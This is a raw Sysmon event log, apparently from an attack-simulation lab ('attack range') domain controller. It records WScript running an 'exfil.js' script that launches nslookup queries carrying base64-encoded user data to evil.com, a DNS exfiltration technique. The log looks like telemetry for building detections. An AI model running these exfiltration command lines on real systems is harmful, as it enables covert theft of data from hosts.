14:21:47.703{2E1864BB-18FB-629A-D745-000000005F02}74567404C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-D845-000000005F02}7688C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.703{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.703{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.703{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.703{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.703{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-D845-000000005F02}7688C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.703{2E1864BB-18FB-629A-D645-000000005F02}77968096C:\Windows\system32\cmd.exe{2E1864BB-18FB-629A-D845-000000005F02}7688C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.708{2E1864BB-18FB-629A-D845-000000005F02}7688C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FB-629A-D645-000000005F02}7796C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlusyzil.tmp 2>&1 10341000x8000000000000000214351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.681{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-D745-000000005F02}7456C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.681{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-D745-000000005F02}7456C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.681{2E1864BB-18FB-629A-D745-000000005F02}74567404C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-D645-000000005F02}7796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.665{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-D745-000000005F02}7456C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.665{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.665{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.650{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.650{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.650{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-D645-000000005F02}7796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.650{2E1864BB-18E0-629A-6742-000000005F02}39761136C:\Windows\System32\WScript.exe{2E1864BB-18FB-629A-D645-000000005F02}7796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.663{2E1864BB-18FB-629A-D645-000000005F02}7796C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlusyzil.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.650{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfse.tmpMD5=5DEA0472F77A6BF3961D4B745AA161B8,SHA256=60802D61581927EFE9566582D9B1AC54D5861CAF9DA1F25F5EA80365318A8915,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.634{2E1864BB-18FB-629A-D445-000000005F02}55567084C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-D545-000000005F02}7388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.634{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.634{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.634{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.634{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.634{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-D545-000000005F02}7388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.634{2E1864BB-18FB-629A-D345-000000005F02}1725100C:\Windows\system32\cmd.exe{2E1864BB-18FB-629A-D545-000000005F02}7388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.636{2E1864BB-18FB-629A-D545-000000005F02}7388C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FB-629A-D345-000000005F02}172C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfse.tmp 2>&1 10341000x8000000000000000214331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.603{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-D445-000000005F02}5556C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.603{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-D445-000000005F02}5556C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.603{2E1864BB-18FB-629A-D445-000000005F02}55567084C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-D345-000000005F02}172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.602{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-D445-000000005F02}5556C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 